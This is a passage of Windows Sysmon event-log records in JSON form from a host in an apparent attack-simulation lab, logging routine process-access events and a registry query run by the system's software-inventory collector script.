C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-00103DE00400}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-00103DE00400}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-1098-5F25-0000-00103DE00400}\r\nSourceProcessId: 4140\r\nSourceThreadId: 4132\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010C0DF0400}\r\nTargetProcessId: 2436\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-1098-5F25-0000-00103DE00400}","SourceProcessId":"4140","SourceThreadId":"4132","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010C0DF0400}","TargetProcessId":"2436","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.026\r\nProcessGuid: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1098-5F25-0000-0010C0DF0400}\r\nParentProcessId: 2436\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.026","ProcessGuid":"{E2A3D6B1-1098-5F25-0000-001035E20400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1098-5F25-0000-0010C0DF0400}","ParentProcessId":"2436","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-1098-5F25-0000-0010C0DF0400}\r\nSourceProcessId: 2436\r\nSourceThreadId: 1828\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010C0DF0400}","SourceProcessId":"2436","SourceThreadId":"1828","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-001035E20400}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\msvcrt.dll+4ba7c|C:\\Windows\\system32\\cmd.exe+103c4|C:\\Windows\\system32\\cmd.exe+10910|C:\\Windows\\system32\\cmd.exe+c36d|C:\\Windows\\system32\\cmd.exe+8ad9|C:\\Windows\\system32\\cmd.exe+6fdd|C:\\Windows\\system32\\cmd.exe+11a9e|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-001035E20400}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2777,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2778,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2779,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 